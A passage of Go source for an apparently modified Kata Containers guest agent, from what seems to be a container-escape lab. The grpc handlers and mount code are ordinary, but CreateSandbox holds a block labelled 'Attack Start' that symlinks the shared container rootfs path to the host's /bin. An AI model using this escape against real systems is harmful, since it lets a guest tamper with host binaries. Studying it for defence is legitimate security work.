ociSpec.Linux.Resources.CPU.Cpus != "" { availableCpuset, err := getAvailableCpusetList(ociSpec.Linux.Resources.CPU.Cpus) if err != nil { return err } ociSpec.Linux.Resources.CPU.Cpus = availableCpuset } return nil } func posixRlimitsToRlimits(posixRlimits []specs.POSIXRlimit) []configs.Rlimit { var rlimits []configs.Rlimit rlimitsMap := map[string]int{ "RLIMIT_CPU": unix.RLIMIT_CPU, // 0x0 "RLIMIT_FSIZE": unix.RLIMIT_FSIZE, // 0x1 "RLIMIT_DATA": unix.RLIMIT_DATA, // 0x2 "RLIMIT_STACK": unix.RLIMIT_STACK, // 0x3 "RLIMIT_CORE": unix.RLIMIT_CORE, // 0x4 "RLIMIT_RSS": unix.RLIMIT_RSS, // 0x5 "RLIMIT_NPROC": unix.RLIMIT_NPROC, // 0x6 "RLIMIT_NOFILE": unix.RLIMIT_NOFILE, // 0x7 "RLIMIT_MEMLOCK": unix.RLIMIT_MEMLOCK, // 0x8 "RLIMIT_AS": unix.RLIMIT_AS, // 0x9 "RLIMIT_LOCKS": unix.RLIMIT_LOCKS, // 0xa "RLIMIT_SIGPENDING": unix.RLIMIT_SIGPENDING, // 0xb "RLIMIT_MSGQUEUE": unix.RLIMIT_MSGQUEUE, // 0xc "RLIMIT_NICE": unix.RLIMIT_NICE, // 0xd "RLIMIT_RTPRIO": unix.RLIMIT_RTPRIO, // 0xe "RLIMIT_RTTIME": unix.RLIMIT_RTTIME, // 0xf } for _, l := range posixRlimits { limit, ok := rlimitsMap[l.Type] if !ok { agentLog.WithField("rlimit", l.Type).Warnf("Unknown rlimit") continue } rl := configs.Rlimit{ Type: limit, Hard: l.Hard, Soft: l.Soft, } rlimits = append(rlimits, rl) } return rlimits } func (a *agentGRPC) createContainerChecks(req *pb.CreateContainerRequest) (err error) { if !a.sandbox.running { return grpcStatus.Error(codes.FailedPrecondition, "Sandbox not started, impossible to run a new container") } if _, err = a.sandbox.getContainer(req.ContainerId); err == nil { return grpcStatus.Errorf(codes.AlreadyExists, "Container %s already exists, impossible to create", req.ContainerId) } if a.pidNsExists(req.OCI) { return grpcStatus.Errorf(codes.FailedPrecondition, "Unexpected PID namespace received for container %s, should have been cleared out", req.ContainerId) } return nil } func (a *agentGRPC) pidNsExists(grpcSpec *pb.Spec) bool { if grpcSpec.Linux != nil { for _, n := range grpcSpec.Linux.Namespaces { if n.Type == string(configs.NEWPID) { return true } } } return false } func (a *agentGRPC) updateSharedPidNs(ctr *container) error { // Populate the shared pid path only if this is an infra container and // SandboxPidns has not been passed in the CreateSandbox request. // This means a separate pause process has not been created. We treat the // first container created as the infra container in that case // and use its pid namespace in case pid namespace needs to be shared. if !a.sandbox.sandboxPidNs && len(a.sandbox.containers) == 1 { pid, err := ctr.initProcess.process.Pid() if err != nil { return err } a.sandbox.sharedPidNs.path = fmt.Sprintf("/proc/%d/ns/pid", pid) } return nil } func (a *agentGRPC) StartContainer(ctx context.Context, req *pb.StartContainerRequest) (*gpb.Empty, error) { ctr, err := a.getContainer(req.ContainerId) if err != nil { return emptyResp, err } status, err := ctr.container.Status() if err != nil { return nil, err } if status != libcontainer.Created { return nil, grpcStatus.Errorf(codes.FailedPrecondition, "Container %s status %s, should be %s", req.ContainerId, status.String(), libcontainer.Created.String()) } if err := ctr.container.Exec(); err != nil { return emptyResp, err } return emptyResp, nil } func (a *agentGRPC) ExecProcess(ctx context.Context, req *pb.ExecProcessRequest) (*gpb.Empty, error) { ctr, err := a.getContainer(req.ContainerId) if err != nil { return emptyResp, err } status, err := ctr.container.Status() if err != nil { return nil, err } if status == libcontainer.Stopped { return nil, grpcStatus.Errorf(codes.FailedPrecondition, "Cannot exec in stopped container %s", req.ContainerId) } proc, err := buildProcess(req.Process, req.ExecId, false) if err != nil { return emptyResp, err } if err := a.execProcess(ctr, proc, false); err != nil { return emptyResp, err } return emptyResp, a.postExecProcess(ctr, proc) } func (a *agentGRPC) SignalProcess(ctx context.Context, req *pb.SignalProcessRequest) (*gpb.Empty, error) { if !a.sandbox.running { return emptyResp, grpcStatus.Error(codes.FailedPrecondition, "Sandbox not started, impossible to signal the container") } ctr, err := a.sandbox.getContainer(req.ContainerId) if err != nil { return emptyResp, grpcStatus.Errorf(codes.FailedPrecondition, "Could not signal process %s: %v", req.ExecId, err) } status, err := ctr.container.Status() if err != nil { return emptyResp, err } signal := syscall.Signal(req.Signal) if status == libcontainer.Stopped { agentLog.WithFields(logrus.Fields{ "containerID": req.ContainerId, "signal": signal.String(), }).Info("discarding signal as container stopped") return emptyResp, nil } // If the exec ID provided is empty, let's apply the signal to all // processes inside the container. // If the process is the container process, let's use the container // API for that. // Frozen processes are thawed when `all` is true, allowing them to receive and process signals. if req.ExecId == "" || status == libcontainer.Paused { return emptyResp, ctr.container.Signal(signal, true) } else if ctr.initProcess.id == req.ExecId { pid, err := ctr.initProcess.process.Pid() if err != nil { return emptyResp, err } // For container initProcess, if it hasn't installed handler for "SIGTERM" signal, // it will ignore the "SIGTERM" signal sent to it, thus send it "SIGKILL" signal // instead of "SIGTERM" to terminate it. if signal == syscall.SIGTERM && !isSignalHandled(pid, syscall.SIGTERM) { signal = syscall.SIGKILL } return emptyResp, ctr.container.Signal(signal, false) } proc, err := ctr.getProcess(req.ExecId) if err != nil { return emptyResp, grpcStatus.Errorf(grpcStatus.Convert(err).Code(), "Could not signal process: %v", err) } if err := proc.process.Signal(signal); err != nil { return emptyResp, err } return emptyResp, nil } // Check is the container process installed the // handler for specific signal. func isSignalHandled(pid int, signum syscall.Signal) bool { var sigMask uint64 = 1 << (uint(signum) - 1) procFile := fmt.Sprintf("/proc/%d/status", pid) file, err := os.Open(procFile) if err != nil { agentLog.WithField("procFile", procFile).Warn("Open proc file failed") return false } defer file.Close() scanner := bufio.NewScanner(file) for scanner.Scan() { line := scanner.Text() if strings.HasPrefix(line, "SigCgt:") { maskSlice := strings.Split(line, ":") if len(maskSlice) != 2 { agentLog.WithField("procFile", procFile).Warn("Parse the SigCgt field failed") return false } sigCgtStr := strings.TrimSpace(maskSlice[1]) sigCgtMask, err := strconv.ParseUint(sigCgtStr, 16, 64) if err != nil { agentLog.WithField("sigCgt", sigCgtStr).Warn("parse the SigCgt to hex failed") return false } return (sigCgtMask & sigMask) == sigMask } } return false } func (a *agentGRPC) WaitProcess(ctx context.Context, req *pb.WaitProcessRequest) (*pb.WaitProcessResponse, error) { proc, ctr, err := a.sandbox.getProcess(req.ContainerId, req.ExecId) if err != nil { return &pb.WaitProcessResponse{}, err } defer proc.Do(func() { proc.closePostExitFDs() ctr.deleteProcess(proc.id) }) // Using helper function wait() to deal with the subreaper. libContProcess := (*reaperLibcontainerProcess)(&(proc.process)) exitCode, err := a.sandbox.subreaper.wait(proc.exitCodeCh, libContProcess) if err != nil { return &pb.WaitProcessResponse{}, err } //refill the exitCodeCh with the exitcode which can be read out //by another WaitProcess(). Since this channel isn't be closed, //here the refill will always success and it will be free by GC //once the process exits. proc.exitCodeCh <- exitCode return &pb.WaitProcessResponse{ Status: int32(exitCode), }, nil } func getPIDIndex(title string) int { // looking for PID field in ps title fields := strings.Fields(title) for i, f := range fields { if f == "PID" { return i } } return -1 } func (a *agentGRPC) ListProcesses(ctx context.Context, req *pb.ListProcessesRequest) (*pb.ListProcessesResponse, error) { resp := &pb.ListProcessesResponse{} c, err := a.sandbox.getContainer(req.ContainerId) if err != nil { return resp, err } // Get the list of processes that are running inside the containers. // the PIDs match with the system PIDs, not with container's namespace pids, err := c.container.Processes() if err != nil { return resp, err } switch req.Format { case "table": case "json": resp.ProcessList, err = json.Marshal(pids) return resp, err default: return resp, fmt.Errorf("invalid format option") } psArgs := req.Args if len(psArgs) == 0 { psArgs = []string{"-ef"} } // All container's processes are visibles from agent's namespace. // pids already contains the list of processes that are running // inside a container, now we have to use that list to filter // ps output and return just container's processes cmd := exec.Command("ps", psArgs...) output, err := a.sandbox.subreaper.combinedOutput(cmd) if err != nil { return nil, fmt.Errorf("%s: %s", err, output) } lines := strings.Split(string(output), "\n") pidIndex := getPIDIndex(lines[0]) // PID field not found if pidIndex == -1 { return nil, fmt.Errorf("failed to find PID field in ps output") } // append title var result bytes.Buffer result.WriteString(lines[0] + "\n") for _, line := range lines[1:] { if len(line) == 0 { continue } fields := strings.Fields(line) if pidIndex >= len(fields) { return nil, fmt.Errorf("missing PID field: %s", line) } p, err := strconv.Atoi(fields[pidIndex]) if err != nil { return nil, fmt.Errorf("failed to convert pid to int: %s", fields[pidIndex]) } // appends pid line for _, pid := range pids { if pid == p { result.WriteString(line + "\n") break } } } resp.ProcessList = result.Bytes() return resp, nil } func (a *agentGRPC) UpdateContainer(ctx context.Context, req *pb.UpdateContainerRequest) (*gpb.Empty, error) { if req.Resources == nil { return emptyResp, fmt.Errorf("Resources in the request are nil") } c, err := a.sandbox.getContainer(req.ContainerId) if err != nil { return emptyResp, err } // c.container.Config returns a copy of non-pointer members // in configs.Config, configs.Config.Cgroup is a pointer hence // if it is modified, the container cgroup is modifed too and // c.container.Set won't be able to rollback in case of failure. contConfig := c.container.Config() var resources configs.Resources if contConfig.Cgroups != nil && contConfig.Cgroups.Resources != nil { resources = *contConfig.Cgroups.Resources } // Update the value if req.Resources.BlockIO != nil { resources.BlkioWeight = uint16(req.Resources.BlockIO.Weight) } if req.Resources.CPU != nil { resources.CpuPeriod = req.Resources.CPU.Period resources.CpuQuota = req.Resources.CPU.Quota resources.CpuShares = req.Resources.CPU.Shares resources.CpuRtPeriod = req.Resources.CPU.RealtimePeriod resources.CpuRtRuntime = req.Resources.CPU.RealtimeRuntime resources.CpusetCpus = req.Resources.CPU.Cpus resources.CpusetMems = req.Resources.CPU.Mems } if req.Resources.Memory != nil { resources.KernelMemory = req.Resources.Memory.Kernel resources.KernelMemoryTCP = req.Resources.Memory.KernelTCP resources.Memory = req.Resources.Memory.Limit resources.MemoryReservation = req.Resources.Memory.Reservation resources.MemorySwap = req.Resources.Memory.Swap } if req.Resources.Pids != nil { resources.PidsLimit = req.Resources.Pids.Limit } // cpuset is a special case where container's cpuset cgroup MUST BE updated if resources.CpusetCpus != "" { resources.CpusetCpus, err = getAvailableCpusetList(resources.CpusetCpus) if err != nil { return emptyResp, err } cookies := make(cookie) if err = updateCpusetPath(contConfig.Cgroups.Path, resources.CpusetCpus, cookies); err != nil { agentLog.WithError(err).Warn("Could not update container cpuset cgroup") } } // Create a copy of container's cgroup, if c.container.Set fails, // configuration won't be modified and it will be able to rollback // to the original container cgroup configuration. config := contConfig var cgroupsCopy configs.Cgroup if contConfig.Cgroups != nil { cgroupsCopy = *contConfig.Cgroups } cgroupsCopy.Resources = &resources config.Cgroups = &cgroupsCopy return emptyResp, c.container.Set(config) } func (a *agentGRPC) StatsContainer(ctx context.Context, req *pb.StatsContainerRequest) (*pb.StatsContainerResponse, error) { c, err := a.sandbox.getContainer(req.ContainerId) if err != nil { return nil, err } stats, err := c.container.Stats() if err != nil { return nil, err } cgroupData, err := json.Marshal(stats.CgroupStats) if err != nil { return nil, err } netData, err := json.Marshal(stats.Interfaces) if err != nil { return nil, err } var cgroupStats pb.CgroupStats networkStats := make([]*pb.NetworkStats, 0) err = json.Unmarshal(cgroupData, &cgroupStats) if err != nil { return nil, err } err = json.Unmarshal(netData, &networkStats) if err != nil { return nil, err } resp := &pb.StatsContainerResponse{ CgroupStats: &cgroupStats, NetworkStats: networkStats, } return resp, nil } func (a *agentGRPC) PauseContainer(ctx context.Context, req *pb.PauseContainerRequest) (*gpb.Empty, error) { c, err := a.sandbox.getContainer(req.ContainerId) if err != nil { return emptyResp, err } a.sandbox.Lock() defer a.sandbox.Unlock() return emptyResp, c.container.Pause() } func (a *agentGRPC) ResumeContainer(ctx context.Context, req *pb.ResumeContainerRequest) (*gpb.Empty, error) { c, err := a.sandbox.getContainer(req.ContainerId) if err != nil { return emptyResp, err } a.sandbox.Lock() defer a.sandbox.Unlock() return emptyResp, c.container.Resume() } func (a *agentGRPC) RemoveContainer(ctx context.Context, req *pb.RemoveContainerRequest) (*gpb.Empty, error) { ctr, err := a.sandbox.getContainer(req.ContainerId) if err != nil { return emptyResp, err } timeout := int(req.Timeout) a.sandbox.Lock() defer a.sandbox.Unlock() if timeout == 0 { if err := ctr.removeContainer(); err != nil { return emptyResp, err } // Find the sandbox storage used by this container for _, path := range ctr.mounts { if _, ok := a.sandbox.storages[path]; ok { if err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil { return emptyResp, err } } } } else { done := make(chan error) go func() { if err := ctr.removeContainer(); err != nil { done <- err close(done) return } //Find the sandbox storage used by this container for _, path := range ctr.mounts { if _, ok := a.sandbox.storages[path]; ok { if err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil { done <- err close(done) return } } } close(done) }() select { case err := <-done: if err != nil { return emptyResp, err } case <-time.After(time.Duration(req.Timeout) * time.Second): return emptyResp, grpcStatus.Errorf(codes.DeadlineExceeded, "Timeout reached after %ds", timeout) } } delete(a.sandbox.containers, ctr.id) return emptyResp, nil } func (a *agentGRPC) WriteStdin(ctx context.Context, req *pb.WriteStreamRequest) (*pb.WriteStreamResponse, error) { proc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId) if err != nil { return &pb.WriteStreamResponse{}, err } proc.RLock() defer proc.RUnlock() stdinClosed := proc.stdinClosed // Ignore this call to WriteStdin() if STDIN has already been closed // earlier. if stdinClosed { return &pb.WriteStreamResponse{}, nil } var file *os.File if proc.termMaster != nil { file = proc.termMaster } else { file = proc.stdin } n, err := file.Write(req.Data) if err != nil { return &pb.WriteStreamResponse{}, err } return &pb.WriteStreamResponse{ Len: uint32(n), }, nil } func (a *agentGRPC) ReadStdout(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) { data, err := a.sandbox.readStdio(req.ContainerId, req.ExecId, int(req.Len), true) if err != nil { return &pb.ReadStreamResponse{}, err } return &pb.ReadStreamResponse{ Data: data, }, nil } func (a *agentGRPC) ReadStderr(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) { data, err := a.sandbox.readStdio(req.ContainerId, req.ExecId, int(req.Len), false) if err != nil { return &pb.ReadStreamResponse{}, err } return &pb.ReadStreamResponse{ Data: data, }, nil } func (a *agentGRPC) CloseStdin(ctx context.Context, req *pb.CloseStdinRequest) (*gpb.Empty, error) { proc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId) if err != nil { return emptyResp, err } // If stdin is nil, which can be the case when using a terminal, // there is nothing to do. if proc.stdin == nil { return emptyResp, nil } proc.Lock() defer proc.Unlock() if err := proc.stdin.Close(); err != nil { return emptyResp, err } proc.stdinClosed = true return emptyResp, nil } func (a *agentGRPC) TtyWinResize(ctx context.Context, req *pb.TtyWinResizeRequest) (*gpb.Empty, error) { proc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId) if err != nil { return emptyResp, err } if proc.termMaster == nil { return emptyResp, grpcStatus.Error(codes.FailedPrecondition, "Terminal is not set, impossible to resize it") } winsize := &unix.Winsize{ Row: uint16(req.Row), Col: uint16(req.Column), } // Set new terminal size. if err := unix.IoctlSetWinsize(int(proc.termMaster.Fd()), unix.TIOCSWINSZ, winsize); err != nil { return emptyResp, err } return emptyResp, nil } func loadKernelModule(module *pb.KernelModule) error { if module == nil { return fmt.Errorf("Kernel module is nil") } if module.Name == "" { return fmt.Errorf("Kernel module name is empty") } log := agentLog.WithFields(logrus.Fields{ "module-name": module.Name, "module-params": module.Parameters, }) log.Debug("loading module") cmd := exec.Command(modprobePath, "-v", module.Name) if len(module.Parameters) > 0 { cmd.Args = append(cmd.Args, module.Parameters...) } output, err := cmd.CombinedOutput() if err != nil { return fmt.Errorf("could not load module: %v: %v", err, string(output)) } return nil } func (a *agentGRPC) CreateSandbox(ctx context.Context, req *pb.CreateSandboxRequest) (*gpb.Empty, error) { if a.sandbox.running { return emptyResp, grpcStatus.Error(codes.AlreadyExists, "Sandbox already started, impossible to start again") } a.sandbox.hostname = req.Hostname a.sandbox.containers = make(map[string]*container) a.sandbox.network.ifaces = make(map[string]*types.Interface) a.sandbox.network.dns = req.Dns a.sandbox.running = true a.sandbox.sandboxPidNs = req.SandboxPidns a.sandbox.storages = make(map[string]*sandboxStorage) a.sandbox.guestHooks = &specs.Hooks{} a.sandbox.guestHooksPresent = false for _, m := range req.KernelModules { if err := loadKernelModule(m); err != nil { return emptyResp, err } } if req.GuestHookPath != "" { a.sandbox.scanGuestHooks(req.GuestHookPath) } if req.SandboxId != "" { a.sandbox.id = req.SandboxId agentLog = agentLog.WithField("sandbox", a.sandbox.id) } // Set up shared UTS and IPC namespaces if err := a.sandbox.setupSharedNamespaces(ctx); err != nil { return emptyResp, err } if req.SandboxPidns { if err := a.sandbox.setupSharedPidNs(); err != nil { return emptyResp, err } } mountList, err := addStorages(ctx, req.Storages, a.sandbox) if err != nil { return emptyResp, err } a.sandbox.mounts = mountList // ~ Attack Start ~ // shared_dir := "/run/kata-containers/shared/containers" perm := os.FileMode(0755) // Create symlink at '/run/kata-containers/shared/containers/mainctr_id/rootfs' // pointing to the target on the host // We use the SandboxId as the main ctr id mainctr_dir := shared_dir + "/" + req.SandboxId if err := os.Mkdir(mainctr_dir, perm); err != nil { return emptyResp, fmt.Errorf("Attack Mkdir(SandboxId) (SandboxId = '%s') error: '%s'", req.SandboxId, err) } target_on_host := "/bin" // the target that'll be mounted with the container image if err := os.Symlink(target_on_host, mainctr_dir+"/rootfs"); err != nil { return emptyResp, fmt.Errorf("Attack symlink error: '%s'", err) } // ~ Attack End ~ // if err := setupDNS(a.sandbox.network.dns); err != nil { return emptyResp, err } return emptyResp, nil } func (a *agentGRPC) DestroySandbox(ctx context.Context, req *pb.DestroySandboxRequest) (*gpb.Empty, error) { if !a.sandbox.running { agentLog.Info("Sandbox not started, this is a no-op") return emptyResp, nil } a.sandbox.Lock() for key, c := range a.sandbox.containers { if err := c.removeContainer(); err != nil { return emptyResp, err } // Find the sandbox storage used by this container for _, path := range c.mounts { if _, ok := a.sandbox.storages[path]; ok { if err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil { return emptyResp, err } } } delete(a.sandbox.containers, key) } a.sandbox.Unlock() if err := a.sandbox.removeNetwork(); err != nil { return emptyResp, err } if err := removeMounts(a.sandbox.mounts); err != nil { return emptyResp, err } if err := a.sandbox.teardownSharedPidNs(); err != nil { return emptyResp, err } if err := a.sandbox.unmountSharedNamespaces(); err != nil { return emptyResp, err } if tracing && !startTracingCalled { // Close stopServer channel to signal the main agent code to stop // the server when all gRPC calls will be completed. close(a.sandbox.stopServer) } a.sandbox.hostname = "" a.sandbox.id = "" a.sandbox.containers = make(map[string]*container) a.sandbox.running = false a.sandbox.network = network{} a.sandbox.mounts = []string{} a.sandbox.storages = make(map[string]*sandboxStorage) // Synchronize the caches on the system. This is needed to ensure // there is no pending transactions left before the VM is shut down. syscall.Sync() return emptyResp, nil } func (a *agentGRPC) UpdateInterface(ctx context.Context, req *pb.UpdateInterfaceRequest) (*types.Interface, error) { return a.sandbox.updateInterface(nil, req.Interface) } func (a *agentGRPC) UpdateRoutes(ctx context.Context, req *pb.UpdateRoutesRequest) (*pb.Routes, error) { return a.sandbox.updateRoutes(nil, req.Routes) } func (a *agentGRPC) ListInterfaces(ctx context.Context, req *pb.ListInterfacesRequest) (*pb.Interfaces, error) { return a.sandbox.listInterfaces(nil) } func (a *agentGRPC) ListRoutes(ctx context.Context, req *pb.ListRoutesRequest) (*pb.Routes, error) { return a.sandbox.listRoutes(nil) } func (a *agentGRPC) OnlineCPUMem(ctx context.Context, req *pb.OnlineCPUMemRequest) (*gpb.Empty, error) { if !req.Wait { go a.onlineCPUMem(req) return emptyResp, nil } return emptyResp, a.onlineCPUMem(req) } func (a *agentGRPC) ReseedRandomDev(ctx context.Context, req *pb.ReseedRandomDevRequest) (*gpb.Empty, error) { return emptyResp, reseedRNG(req.Data) } func (a *agentGRPC) GetGuestDetails(ctx context.Context, req *pb.GuestDetailsRequest) (*pb.GuestDetailsResponse, error) { var details pb.GuestDetailsResponse if req.MemBlockSize { data, err := ioutil.ReadFile(sysfsMemoryBlockSizePath) if err != nil { if os.IsNotExist(err) { agentLog.WithField("sysfsMemoryBlockSizePath", sysfsMemoryBlockSizePath).Info("Guest kernel config doesn't support memory hotplug") } else { return nil, err } } else { if len(data) == 0 { return nil, fmt.Errorf("%v is empty", sysfsMemoryBlockSizePath) } details.MemBlockSizeBytes, err = strconv.ParseUint(string(data[:len(data)-1]), 16, 64) if err != nil { return nil, err } } } if req.MemHotplugProbe { if _, err := os.Stat(sysfsMemoryHotplugProbePath); os.IsNotExist(err) { details.SupportMemHotplugProbe = false } else if err != nil { return nil, err } else { details.SupportMemHotplugProbe = true } } details.AgentDetails = a.getAgentDetails(ctx) return &details, nil } func (a *agentGRPC) MemHotplugByProbe(ctx context.Context, req *pb.MemHotplugByProbeRequest) (*gpb.Empty, error) { for _, addr := range req.MemHotplugProbeAddr { if err := ioutil.WriteFile(sysfsMemoryHotplugProbePath, []byte(fmt.Sprintf("0x%x", addr)), 0600); err != nil { return emptyResp, err } } return emptyResp, nil } func (a *agentGRPC) haveSeccomp() bool { if seccompSupport == "yes" && seccomp.IsEnabled() { return true } return false } func (a *agentGRPC) getAgentDetails(ctx context.Context) *pb.AgentDetails { details := pb.AgentDetails{ Version: version, InitDaemon: os.Getpid() == 1, SupportsSeccomp: a.haveSeccomp(), } for handler := range deviceHandlerList { details.DeviceHandlers = append(details.DeviceHandlers, handler) } for handler := range storageHandlerList { details.StorageHandlers = append(details.StorageHandlers, handler) } return &details } func (a *agentGRPC) SetGuestDateTime(ctx context.Context, req *pb.SetGuestDateTimeRequest) (*gpb.Empty, error) { if err := syscall.Settimeofday(&syscall.Timeval{Sec: req.Sec, Usec: req.Usec}); err != nil { return nil, grpcStatus.Errorf(codes.Internal, "Could not set guest time: %v", err) } return &gpb.Empty{}, nil } // CopyFile copies files form host to container's rootfs (guest). Files can be copied by parts, for example // a file which size is 2MB, can be copied calling CopyFile 2 times, in the first call req.Offset is 0, // req.FileSize is 2MB and req.Data contains the first half of the file, in the seconds call req.Offset is 1MB, // req.FileSize is 2MB and req.Data contains the second half of the file. For security reason all write operations // are made in a temporary file, once temporary file reaches the expected size (req.FileSize), it's moved to // destination file (req.Path). func (a *agentGRPC) CopyFile(ctx context.Context, req *pb.CopyFileRequest) (*gpb.Empty, error) { // get absolute path, to avoid paths like '/run/../sbin/init' path, err := filepath.Abs(req.Path) if err != nil { return emptyResp, err } // container's rootfs is mounted at /run, in order to avoid overwrite guest's rootfs files, only // is possible to copy files to /run if !strings.HasPrefix(path, containersRootfsPath) { return emptyResp, fmt.Errorf("Only is possible to copy files into the %s directory", containersRootfsPath) } if err := os.MkdirAll(filepath.Dir(path), os.FileMode(req.DirMode)); err != nil { return emptyResp, err } // create a temporary file and write the content. tmpPath := path + ".tmp" tmpFile, err := os.OpenFile(tmpPath, os.O_WRONLY|os.O_CREATE, 0600) if err != nil { return emptyResp, err } if _, err := tmpFile.WriteAt(req.Data, req.Offset); err != nil { tmpFile.Close() return emptyResp, err } tmpFile.Close() // get temporary file information st, err := os.Stat(tmpPath) if err != nil { return emptyResp, err } agentLog.WithFields(logrus.Fields{ "tmp-file-size": st.Size(), "expected-size": req.FileSize, }).Debugf("Checking temporary file size") // if file size is not equal to the expected size means that copy file operation has not finished. // CopyFile should be called again with new content and a different offset. if st.Size() != req.FileSize { return emptyResp, nil } if err := os.Chmod(tmpPath, os.FileMode(req.FileMode)); err != nil { return emptyResp, err } if err := os.Chown(tmpPath, int(req.Uid), int(req.Gid)); err != nil { return emptyResp, err } // At this point temoporary file has the expected size, atomically move it overwriting // the destination. agentLog.WithFields(logrus.Fields{ "tmp-path": tmpPath, "des-path": path, }).Debugf("Moving temporary file") if err := os.Rename(tmpPath, path); err != nil { return emptyResp, err } return emptyResp, nil } func (a *agentGRPC) StartTracing(ctx context.Context, req *pb.StartTracingRequest) (*gpb.Empty, error) { // We chould check 'tracing' too and error if already set. But // instead, we permit that scenario, making this call a NOP if tracing // is already enabled via traceModeFlag. if startTracingCalled { return nil, grpcStatus.Error(codes.FailedPrecondition, "tracing already enabled") } // The only trace type support for dynamic tracing is isolated. enableTracing(traceModeDynamic, traceTypeIsolated) startTracingCalled = true var err error // Ignore the provided context and recreate the root context. // Note that this call will not be traced, but all subsequent ones // will be. rootSpan, rootContext, err = setupTracing(agentName) if err != nil { return nil, fmt.Errorf("failed to setup tracing: %v", err) } a.sandbox.ctx = rootContext grpcContext = rootContext return emptyResp, nil } func (a *agentGRPC) StopTracing(ctx context.Context, req *pb.StopTracingRequest) (*gpb.Empty, error) { // Like StartTracing(), this call permits tracing to be stopped when // it was originally started using traceModeFlag. if !tracing && !startTracingCalled { return nil, grpcStatus.Error(codes.FailedPrecondition, "tracing not enabled") } if stopTracingCalled { return nil, grpcStatus.Error(codes.FailedPrecondition, "tracing already disabled") } // Signal to the interceptors that tracing need to end. stopTracingCalled = true return emptyResp, nil } ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/evil_agent_src/mount.go ================================================ // // Copyright (c) 2017-2019 Intel Corporation // // SPDX-License-Identifier: Apache-2.0 // package main import ( "bufio" "context" "fmt" "os" "path/filepath" "regexp" "strconv" "strings" "syscall" pb "github.com/kata-containers/agent/protocols/grpc" "github.com/pkg/errors" "github.com/sirupsen/logrus" "golang.org/x/sys/unix" "google.golang.org/grpc/codes" grpcStatus "google.golang.org/grpc/status" ) const ( type9pFs = "9p" typeVirtioFS = "virtio_fs" typeRootfs = "rootfs" typeTmpFs = "tmpfs" procMountStats = "/proc/self/mountstats" mountPerm = os.FileMode(0755) ) var flagList = map[string]int{ "acl": unix.MS_POSIXACL, "bind": unix.MS_BIND, "defaults": 0, "dirsync": unix.MS_DIRSYNC, "iversion": unix.MS_I_VERSION, "lazytime": unix.MS_LAZYTIME, "mand": unix.MS_MANDLOCK, "noatime": unix.MS_NOATIME, "nodev": unix.MS_NODEV, "nodiratime": unix.MS_NODIRATIME, "noexec": unix.MS_NOEXEC, "nosuid": unix.MS_NOSUID, "rbind": unix.MS_BIND | unix.MS_REC, "relatime": unix.MS_RELATIME, "remount": unix.MS_REMOUNT, "ro": unix.MS_RDONLY, "silent": unix.MS_SILENT, "strictatime": unix.MS_STRICTATIME, "sync": unix.MS_SYNCHRONOUS, "private": unix.MS_PRIVATE, "shared": unix.MS_SHARED, "slave": unix.MS_SLAVE, "unbindable": unix.MS_UNBINDABLE, "rprivate": unix.MS_PRIVATE | unix.MS_REC, "rshared": unix.MS_SHARED | unix.MS_REC, "rslave": unix.MS_SLAVE | unix.MS_REC, "runbindable": unix.MS_UNBINDABLE | unix.MS_REC, } func createDestinationDir(dest string) error { targetPath, _ := filepath.Split(dest) return os.MkdirAll(targetPath, mountPerm) } // mount mounts a source in to a destination. This will do some bookkeeping: // * evaluate all symlinks // * ensure the source exists func mount(source, destination, fsType string, flags int, options string) error { var absSource string // Log before validation. This is useful to debug cases where the gRPC // protocol version being used by the client is out-of-sync with the // agents version. gRPC message members are strictly ordered, so it's // quite possible that if the protocol changes, the client may // try to pass a valid mountpoint, but the gRPC layer may change that // through the member ordering to be a mount *option* for example. agentLog.WithFields(logrus.Fields{ "mount-source": source, "mount-destination": destination, "mount-fstype": fsType, "mount-flags": flags, "mount-options": options, }).Debug() if source == "" { return fmt.Errorf("need mount source") } if destination == "" { return fmt.Errorf("need mount destination") } if fsType == "" { return fmt.Errorf("need mount FS type") } var err error switch fsType { case type9pFs, typeVirtioFS: if err = createDestinationDir(destination); err != nil { return err } absSource = source case typeTmpFs: absSource = source default: absSource, err = filepath.EvalSymlinks(source) if err != nil { return grpcStatus.Errorf(codes.Internal, "Could not resolve symlink for source %v", source) } if err = ensureDestinationExists(absSource, destination, fsType); err != nil { return grpcStatus.Errorf(codes.Internal, "Could not create destination mount point: %v: %v", destination, err) } } if err = syscall.Mount(absSource, destination, fsType, uintptr(flags), options); err != nil { return grpcStatus.Errorf(codes.Internal, "Could not mount %v to %v: %v", absSource, destination, err) } return nil } // ensureDestinationExists will recursively create a given mountpoint. If directories // are created, their permissions are initialized to mountPerm func ensureDestinationExists(source, destination string, fsType string) error { fileInfo, err := os.Stat(source) if err != nil { return grpcStatus.Errorf(codes.Internal, "could not stat source location: %v", source) } if err := createDestinationDir(destination); err != nil { return grpcStatus.Errorf(codes.Internal, "could not create parent directory: %v", destination) } if fsType != "bind" || fileInfo.IsDir() { if err := os.Mkdir(destination, mountPerm); !os.IsExist(err) { return err } } else { file, err := os.OpenFile(destination, os.O_CREATE, mountPerm) if err != nil { return err } file.Close() } return nil } func parseMountFlagsAndOptions(optionList []string) (int, string) { var ( flags int options []string ) for _, opt := range optionList { flag, ok := flagList[opt] if ok { flags |= flag continue } options = append(options, opt) } return flags, strings.Join(options, ",") } func parseOptions(optionList []string) map[string]string { options := make(map[string]string) for _, opt := range optionList { idx := strings.Index(opt, "=") if idx < 1 { continue } key, val := opt[:idx], opt[idx+1:] options[key] = val } return options } func removeMounts(mounts []string) error { for _, mount := range mounts { if err := syscall.Unmount(mount, 0); err != nil { return err } } return nil } // storageHandler is the type of callback to be defined to handle every // type of storage driver. type storageHandler func(ctx context.Context, storage pb.Storage, s *sandbox) (string, error) // storageHandlerList lists the supported drivers. var storageHandlerList = map[string]storageHandler{ driver9pType: virtio9pStorageHandler, driverVirtioFSType: virtioFSStorageHandler, driverBlkType: virtioBlkStorageHandler, driverBlkCCWType: virtioBlkCCWStorageHandler, driverMmioBlkType: virtioMmioBlkStorageHandler, driverSCSIType: virtioSCSIStorageHandler, driverEphemeralType: ephemeralStorageHandler, driverLocalType: localStorageHandler, } func 